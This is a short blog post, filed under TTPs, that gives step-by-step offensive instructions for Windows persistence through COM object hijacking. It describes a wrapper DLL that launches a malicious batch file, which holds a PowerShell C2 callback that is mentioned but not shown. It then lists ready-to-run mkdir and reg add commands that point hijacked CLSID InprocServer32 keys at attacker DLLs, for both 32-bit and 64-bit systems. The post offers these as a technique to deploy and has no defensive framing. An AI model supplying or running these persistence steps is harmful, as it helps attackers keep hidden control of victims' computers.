COM Object Persistence

November 14, 2021 0 By Ryan Barger

The COM (Component Object Model) provide an interface for object to interact with objects in other processes. Calls to COM objects are continually occurring within Microsoft Windows. This provides a reliable means for deploying persistence.

Each COM object is defined by a UID; called CLSID. The CLSIDs referenced in this TTP do not exist by default and are affiliated with the CaccPropServicesClass and MMDeviceEnumerator. Internet Explorer is one of the applications which frequently calls the CLSIDs.

Process

Create a wrapper DLL to be loaded by the OS.  (1) A unique value needed to be added for the Mutex.  This ensures that the application will only be run once.  (2) The program will eventually call “api-ms-win-downlevel-l1-1-0.bat”.

Upload a malicious batch file to the directory referenced in the above wrapper DLL. The file depicted below contains a powershell one-liner to spawn a C2 callback.

Run a batch file to add all accompanying folders and registry entries. The following code snippet contains values needed for both either a 32bit or 64bit machine.

mkdir c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
reg add "HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /t REG_SZ /f /d "c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl"
reg add "HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /v "ThreadingModel" /t REG_SZ /f /d "Apartment"
reg add "HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32" /t REG_SZ /f /d "c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dl"
reg add "HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32" /v "ThreadingModel" /t REG_SZ /f /d "Apartment"

Upload the wrapper DLL into the newly created directory. 

c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dl
c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl

CategoryTTPs

Leave a Reply